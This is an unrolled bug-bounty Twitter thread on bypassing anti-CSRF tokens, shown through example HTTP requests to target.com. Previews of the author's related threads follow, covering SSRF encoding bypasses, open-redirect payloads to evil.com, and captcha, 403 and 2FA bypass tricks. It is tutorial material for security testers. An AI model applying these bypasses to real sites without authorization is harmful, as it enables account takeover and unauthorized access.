Abhishek Meena Profile picture
Oct 31 10 tweets 7 min read
Bypass CSRF🔥#bugbountytips

➡Change single character
➡Sending empty value of token
➡Replace the token with same length
➡Changing POST / GET method
➡Remove the token from request
➡Use another user's valid token
➡Try to decrypt hash

#bugbounty #infosec

More in Detail :👇
▪ Change single character of Parameter token #bugbounty #CSRF
. . .

POST /register HTTP/1.1
Host: target.com
...

username=dapos&password=123456&token=aaaaaaaaaa

To

username=dapos&password=123456&token=aaaaaaaaab
▪ Sending empty value of token #bugbounty #bugboutnytips #CSRF
. . .

POST /register HTTP/1.1
Host: target.com
...

username=dapos&password=123456&token=aaaaaaaaaa

To

username=dapos&password=123456&token=
▪ Replace the token with same length
. . . #bugbounty #bugbountytips #infosec

POST /register HTTP/1.1
Host: target.com
...

username=dapos&password=123456&token=aaaaaa

To

username=dapos&password=123456&token=aaabaa
▪ Changing POST / GET method #bugbounty
. . . #bugbountytips #infosec

POST /register HTTP/1.1
Host: target.com
...

username=dapos&password=123456&token=aaaaaaaaaa

To

GET /register HTTP/1.1
▪ Remove the whole token parameter from request
. . . #bugbounty #CSRF

POST /register HTTP/1.1
Host: target.com
...

username=dapos&password=123456&token=aaaaaaaaaa

To

username=dapos&password=123456
▪ Use another user's valid token #bugbounty #bugbountytips #CSRF
. . .
POST /register HTTP/1.1
Host: target.com
...

username=dapos&password=123456&token=aaaaaaaaaa

To

username=dapos&password=123456&token=bbbbbbbbbb
▪ Try to decrypt hash #bugbounty #CSRF

Decrypt value of the token hash contain sensitive info
Like :

POST /register HTTP/1.1
Host: target.com
...

username=dapos&password=123456&token=MTIzNDU2

MTIzNDU2 => 123456 with base64
▪ [IMP] Sometimes anti-CSRF token is composed in 2 parts, one remains static while other dynamic
Like :

token=asdf123

resend again, the request like this

token=asdf124

If you notice "asdf" part of the token remain same, you just need to send with only static part #CSRF
Thanks You To Read😃👍

Hope you like these all | Do Follow For More

&

Checkout my bugbountytips cybersecurity telegram Group :
t.me/bugbountyresou…

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Abhishek Meena

Abhishek Meena Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @Aacle_

Oct 31
Server Side Request Forgery(SSRF)
#bugbounty #infosec

🧵: (1/n) ⬇⬇⬇
🏹Use Different Encoding Schemes of https://127.O.O.1

➡Hex Encoding https://Ox7f.OxO.OxO.Ox1
➡Octal Encoding https://0177.O.O.01
➡Dword Encoding https://2130706433
➡URL Encoding ➡https://%6c%6f%63%61%6c%68%6f%73%74
➡Mixed Encoding https://0177.O.O.Ox1

🧵: (2/n) :👇
🏹Use The Whole IP Range For Testing SSRF
(198.0.0.1-255) #bugbounty
. . .
🏹Obfuscate Strings In URL Encode or Case Transformation (Blocked Words Bypass)

🏹Use Registered Domain Names That Resolves To 127.0.0.1

🏹Embed Credentials : https://attacker@victim.com

🧵: (3/n) :👇
Read 6 tweets
Oct 31
Open Redirection 🔥 #bugbounty

Arises when Application incorporates user-controllable data into target of a redirection in an unsafe way.

▪ Where to find
➡Sometimes it can be found in login / register / logout pages
➡Checking the javascript source code

How to exploit 👇
🏹Change the domain
/?redir=evil.com

🏹Using a whitelisted domain or keyword
/?redir=target.com.evil.com

🏹Using // to bypass http blacklisted keyword
/?redir=//evil.com

🏹Using https: to bypass // blacklisted keyword
/?redir=https:evil.com
🏹Using \\ to bypass // blacklisted keyword
/?redir=\\evil.com

🏹Using \/\/ to bypass // blacklisted keyword
/?redir=\/\/evil.com/
/?redir=/\/evil.com/

🏹Using %E3%80%82 to bypass . blacklisted character
/?redir=evil。com
/?redir=evil%E3%80%82com

#bugbountytips
Read 9 tweets
Oct 30
🔥Bypass Captcha🤗(Google reCAPTCHA) #bugbounty

➡Try changing the request method, for example POST to GET
➡Try remove the value of the captcha parameter
➡Try reuse old captcha token
➡Convert JSON data to normal request parameter

#bugbountytips #infosec

More in Detail :👇🏻
🏹Try changing the request method, for example POST to GET #bugbounty #bugbountytips
. . .
POST / HTTP 1.1
Host: target.com

_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=yyyyyy&_Password=zzzzzzzz
. . .

Bypass by Changing the POST method to GET
🏹Try remove the value of the captcha parameter
. . . #bugbounty #infosec

POST / HTTP 1.1
Host: target.com

_RequestVerificationToken=&_Username=daffa&_Password=test123

Bypass by removing value of captcha
Read 8 tweets
Oct 30
🎆Bypass 403🎆 #bugbountytips

➡Using "X-Original-URL" header
➡Appending %2e after the first slash
➡Try add dot (.) slash (/) and semicolon (;) in the URL
➡Add "..;/" after the directory name
➡Try to uppercase the alphabet in the url

#bugbounty #infosec🤗

More Detail :👇🏻
🏹Using "X-Original-URL" header :
. . .
Request :
GET /admin HTTP/1.1
Host: target.com

Try this to bypass with
. . .
GET /anything HTTP/1.1
Host: https://t.co/GdtCkHfF3G
X-Original-URL: /admin
🏹Appending %2e after the first slash
. . .
Request :
target.com/admin => 403

Try to Bypass with
. . .
target.com/%2e/admin => 200
Read 7 tweets
Oct 30
10 Tips To Bypass 2FA
#2FA #bugbounty #bugbountytips #infosec

🧵(1/11)👇:
➡Response manipulation
The response is like: #2FA_Bypass #bugbounty

HTTP/1.1 404 Not Found
. . .
{"code": false}
. . .
Try to manipulate by changing {"code": true}
➡Status code manipulation
The response is : #2FA_Bypass #bugbounty

HTTP/1.1 404 Not Found
...
{"code": false}

Try to manipulate by changing :

HTTP/1.1 200 OK
...
{"code": false}
Read 10 tweets
Oct 29
Some of the major vulnerabilities and related POC’s:

➡SQLi
➡XSS
➡SSRF
➡XXE
➡Path Traversal
➡Open Redirection
➡Account Takeover
➡Remote code execution
➡IDOR
➡CSRF

#hacking #bugbounty #bugbountytips

Are Found Below🧵(1/n)👇
Read 12 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(